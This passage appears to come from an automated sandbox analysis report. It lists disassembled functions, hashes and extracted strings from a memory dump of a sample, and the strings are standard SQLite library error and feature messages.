                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ascii$bm25$fts5$fts5_get_locale$fts5_locale$fts5_source_id$highlight$porter$snippet$trigram$unable to delete/modify user-function due to active statements$unicode61
                                                                                                                                                                                      • API String ID: 0-4043592257
                                                                                                                                                                                      • Opcode ID: 5a97417b68fda1cc2b05fa7d698c2bbf5caac5caed2120627807f30a7dc0b696
                                                                                                                                                                                      • Instruction ID: 011af7ff12707e13a019d292b23b5459f663cfeb272890011ddac972c1429b60
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a97417b68fda1cc2b05fa7d698c2bbf5caac5caed2120627807f30a7dc0b696
                                                                                                                                                                                      • Instruction Fuzzy Hash: D9A29E62A09B4286EB588F21E5403B967A5FB49F84F474137CA8E073A5DFBCE4D5C342
                                                                                                                                                                                      Function 00007FFEEE135450 Relevance: 15.5, Strings: 12, Instructions: 521COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Child page depth differs$Extends off end of page$Fragmentation of %u bytes reported as %u on page %u$Multiple uses for byte %u of page %u$Offset %u out of range %u..%u$Rowid %lld out of order$Tree %u page %u cell %u: $Tree %u page %u right child: $Tree %u page %u: $btreeInitPage() returns error code %d$free space corruption$unable to get the page. error code=%d
                                                                                                                                                                                      • API String ID: 0-835090162
                                                                                                                                                                                      • Opcode ID: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                      • Instruction ID: 1a9891b3b5eeabb527b170a977efa9755a891096696dce03eeba7af0e5e055c2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C32C036A18A918AD7648F25F04076EBBA1F785B84F434136DACA43B64DFBDE485CB01
                                                                                                                                                                                      Function 00007FFEEE1B7A30 Relevance: 15.5, Strings: 12, Instructions: 472COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: PRIMARY KEY$UNIQUE$UPDATE "%w".sqlite_master SET sql = sqlite_drop_column(%d, sql, %d) WHERE (type=='table' AND tbl_name=%Q COLLATE nocase)$after drop column$cannot %s %s "%s"$cannot drop %s column: "%s"$cannot drop column "%s": no other columns exist$drop column from$no such column: "%T"$q$view$virtual table
                                                                                                                                                                                      • API String ID: 0-74819023
                                                                                                                                                                                      • Opcode ID: 7c9c1350548b3c45b0d0cf0d64804b1f4f04c3b21d22e22a8189cc0807441005
                                                                                                                                                                                      • Instruction ID: 4fd9f2337764e99c4a88ea347641d29dd3b2a820cf4c99044d840900226acbf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c9c1350548b3c45b0d0cf0d64804b1f4f04c3b21d22e22a8189cc0807441005
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82228E32A087958AD764DF16E080BB977A5FB88B84F438136DA8E47765EFBCD481C701
                                                                                                                                                                                      Function 00007FFEEE19CD0F Relevance: 12.2, Strings: 9, Instructions: 991COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %r %s BY term out of range - should be between 1 and %d$INTERSECT$LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                      • API String ID: 0-3976573709
                                                                                                                                                                                      • Opcode ID: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                      • Instruction ID: 64de2289cddf1aed430d50c128831ff11d5ea47ac7c780f417b12afa820483b3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EB27B72A0968286EB659F25F4407BD77A1FB84B84F174036CACE07665DFBEE481C702
                                                                                                                                                                                      Function 00007FFEEE162FD0 Relevance: 11.9, Strings: 8, Instructions: 1892COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$%s_segments$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$block$misuse
                                                                                                                                                                                      • API String ID: 0-2527169551
                                                                                                                                                                                      • Opcode ID: 078be2cb82fe475e00247dfe45d6048175e603bb34f10f66713d1383a0d428a5
                                                                                                                                                                                      • Instruction ID: 62fe3e6cce2863dd19cdc91a0b01e3d1182404307eaeac9a9c4658292b44c771
                                                                                                                                                                                      • Opcode Fuzzy Hash: 078be2cb82fe475e00247dfe45d6048175e603bb34f10f66713d1383a0d428a5
                                                                                                                                                                                      • Instruction Fuzzy Hash: DE038D62A0965385FB548F65F4503B927A1BF88B88F074536CE8E577B6CFBCE4818342
                                                                                                                                                                                      Function 00007FFEEE10B930 Relevance: 10.4, Strings: 8, Instructions: 392COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s a subset of columns on fts5 contentless-delete table: %s$%s contentless fts5 table: %s$'delete' may not be used with a contentless_delete=1 table$cannot DELETE from contentless fts5 table: %s$cannot UPDATE$delete$fts5_locale() requires locale=1$version
                                                                                                                                                                                      • API String ID: 0-2196455284
                                                                                                                                                                                      • Opcode ID: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                      • Instruction ID: 55ce20d7ee17949b4baac0d1cdc0f618da38d7ae577b960a3b5cffe3b4d09cc9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F1A761A0865386EB609A56B464B7A2790FB44B84F434033DF8D476B9EFBCE8D1C742
                                                                                                                                                                                      Function 00007FFEEE2186B0 Relevance: 10.4, Strings: 8, Instructions: 385COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                      • API String ID: 0-875588658
                                                                                                                                                                                      • Opcode ID: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                      • Instruction ID: d4173bab8f47e50490b540663f9863c221c1623d944fcbf236b99a398ddbbf20
                                                                                                                                                                                      • Opcode Fuzzy Hash: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                      • Instruction Fuzzy Hash: C5028262F0864689FB28CF65F4803BC37A1AB88748F074172DE8E566B5DEBCE545C342
                                                                                                                                                                                      Function 00007FFEEE13FBD0 Relevance: 10.2, Strings: 7, Instructions: 1439COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: @$BINARY$E$Expression tree is too large (maximum depth %d)$NOCASE$ON clause references tables to its right$false
                                                                                                                                                                                      • API String ID: 0-1048875598
                                                                                                                                                                                      • Opcode ID: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                      • Instruction ID: a1431418988068b16149bc3bccab189a9b87ecf68e4a4eb968430942b1e019d8
                                                                                                                                                                                      • Opcode Fuzzy Hash: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D2B262A0878186E7648F26E14077977A1FB48B84F07513BDE9D477A9DF7CE890C702
                                                                                                                                                                                      Function 00007FFEEE19CDCA Relevance: 9.5, Strings: 7, Instructions: 768COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                      • API String ID: 0-3346138532
                                                                                                                                                                                      • Opcode ID: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                      • Instruction ID: b470e967fd8d87c57c1af8e7fea031d8fa92e41590fdaf54e1d4a0adb27923b0
                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                      • Instruction Fuzzy Hash: D8824D72A0868186E7659F15F0407AAB7A1FB84B84F174036DBCE47B65DF7EE481CB02
                                                                                                                                                                                      Function 00007FFEEE19CD82 Relevance: 9.5, Strings: 7, Instructions: 725COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                      • API String ID: 0-3346138532
                                                                                                                                                                                      • Opcode ID: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                      • Instruction ID: 11469043e2e86274bd817d9e4fa6907d199e08671c4e8cf47594ff5b0d377926
                                                                                                                                                                                      • Opcode Fuzzy Hash: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 77725E72A0868186E7659F15F0407AEB7A1FB84B84F174036DBCE47A65DF7EE481CB02
                                                                                                                                                                                      Function 00007FFEEE1AD940 Relevance: 9.3, Strings: 7, Instructions: 553COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$GROUP$HAVING clause on a non-aggregate query$ORDER$aggregate functions are not allowed in the GROUP BY clause$too many terms in ORDER BY clause
                                                                                                                                                                                      • API String ID: 0-2302332886
                                                                                                                                                                                      • Opcode ID: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                      • Instruction ID: d4aab9984b629f4f9b38d882adcaede2a59170a0390472e4b8cf259e91546517
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC327C72A08A428AEB14CF65E1803BD37A1FB44B88F474036DE8D677A5DF78E495C302
                                                                                                                                                                                      Function 00007FFEEE1696B0 Relevance: 9.2, Strings: 6, Instructions: 1750COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$DELETE FROM '%q'.'%q_idx' WHERE (segid, (pgno/2)) = (?1, ?2)$REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)$block$misuse
                                                                                                                                                                                      • API String ID: 0-1819929800
                                                                                                                                                                                      • Opcode ID: 6957eb0a29fed5253a688e71034a2f6c56332714ccf9af88f8654fc03cd0c5d4
                                                                                                                                                                                      • Instruction ID: daafbbc2dcc5d0c62d3017d97f654cdad5e751f686abbb3c37b181f9f236d7e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6957eb0a29fed5253a688e71034a2f6c56332714ccf9af88f8654fc03cd0c5d4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF25B72A0964386EB549F25F4543B837A1FB48B84F074036DA8E477A6DFBDE885C342
                                                                                                                                                                                      Function 00007FFEEE1BD810 Relevance: 9.2, Strings: 7, Instructions: 444COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                      • API String ID: 0-741541785
                                                                                                                                                                                      • Opcode ID: 5d232b5b87d01dbe22b5cbe3e294ebfdbdc39e8ff610561b42d71e1cb040bb58
                                                                                                                                                                                      • Instruction ID: 7356f02e59cff94478f43f73aea9087308af2a175c5018e1d5bbe77ef842de9c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d232b5b87d01dbe22b5cbe3e294ebfdbdc39e8ff610561b42d71e1cb040bb58
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65126E72A09742CAEB58CF25E4507BD37A1FB98744F13413ADA8D477A4EFB9E4818B01
                                                                                                                                                                                      Function 00007FFEEE259AC0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1239891234-0
